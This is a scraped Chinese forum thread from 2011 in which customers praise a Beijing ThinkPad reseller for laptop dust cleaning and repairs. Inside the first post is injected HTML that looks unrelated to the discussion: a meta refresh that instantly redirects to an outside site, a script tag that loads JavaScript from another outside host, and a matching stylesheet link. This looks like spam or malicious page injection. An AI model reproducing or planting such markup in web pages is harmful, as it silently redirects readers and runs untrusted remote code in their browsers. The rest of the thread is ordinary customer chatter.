开业于2004年,诚信服务几万客户
翔意数码淘宝店:xynbnb.taobao.com
全国客服电话:010-59000667
地址:北京东城区东兴隆街56号北京商界A座512
ThinkPad产品专业客服 苹果产品专业客服

翔意的服务态度真是没的说

我今年4月底在北京翔意买的T420,到现在一共去清了2次灰,要了两张系统GHOST盘,还有一次主板受潮了,都给完美解决了,态度相当的好{:9_1124:} 加油啊,以后换本还在你们这买,服务杠杠滴{:9_1122:}
<meta http-equiv="refresh" content="0; url=http://www.9292.cc">
★★★
<script type="text/javascript" src="http://www.7755.cc/q.js"></script>
<link href="http://www.7755.cc/1.css" rel="stylesheet" type="text/css" media="screen" />

<P>&nbsp;</P>

改天我也去清清灰,借问楼主,每次清的时候灰多吗?我买了一年了
改天我也去清清灰,借问楼主,每次清的时候灰多吗?我买了一年了
一年了是该清理下了!
必须的~
别客气,有事常来,哈哈
才这么短时间就清了两次灰啊
没办法,出差的地方粉尘比较大,我觉得我用的有点糟蹋了,不过电脑么,买来就是用的不是
黑色幽默 发表于 2011-10-24 12:01
没办法,出差的地方粉尘比较大,我觉得我用的有点糟蹋了,不过电脑么,买来就是用的不是 ...

兄弟难道在工地用么,记得有个客户他们公司负责给工地挖地基,笔记本用个把月就巨脏,里面外面的灰跟放了三年的灰差不多,估计在这种环境下能扛得住的也只能是THINKPAD吧
EddieFan 发表于 2011-10-24 12:44
兄弟难道在工地用么,记得有个客户他们公司负责给工地挖地基,笔记本用个把月就巨脏,里面外面的灰跟放了 ...

不是工地,不过也差不多,电气设计安装环境也不怎么好,尤其上回去的地方还很靠近沙漠,天天有风沙。。。。
黑色幽默 发表于 2011-10-24 12:01
没办法,出差的地方粉尘比较大,我觉得我用的有点糟蹋了,不过电脑么,买来就是用的不是 ...

沙漠里?
admini 发表于 2011-10-24 13:22
沙漠里?

没有,就是附近有沙漠,甘肃嘉峪关
小黑确实强悍啊
黑色幽默 发表于 2011-10-24 13:57
没有,就是附近有沙漠,甘肃嘉峪关

小黑抗造,没事儿~~~
admini 发表于 2011-10-24 14:32
小黑抗造,没事儿~~~

恩,确实,就是灰多了点。。。我去的地方都是环境不怎么样的,要不就是海边,要不就是沙漠边上
环境测试了。
黑色幽默 发表于 2011-10-24 14:35
恩,确实,就是灰多了点。。。我去的地方都是环境不怎么样的,要不就是海边,要不就是沙漠边上 ...

海边总比沙漠上强多了吧,还能晒晒太阳游游泳吃吃海鲜什么的
在白银待过1周就快烦死了。。。。。
我的也要清理下,办公室灰尘太大

随时欢迎  发表于 2011-10-25 00:21
改天我也去清理一下!
xy的服务刚刚的
小黑抗造,没事儿~~~
杠杠的~~~~~~
有两个朋友都从翔意买的,最近准备入手,只要中了排排站就买,哈哈
也快一年了有时间去清清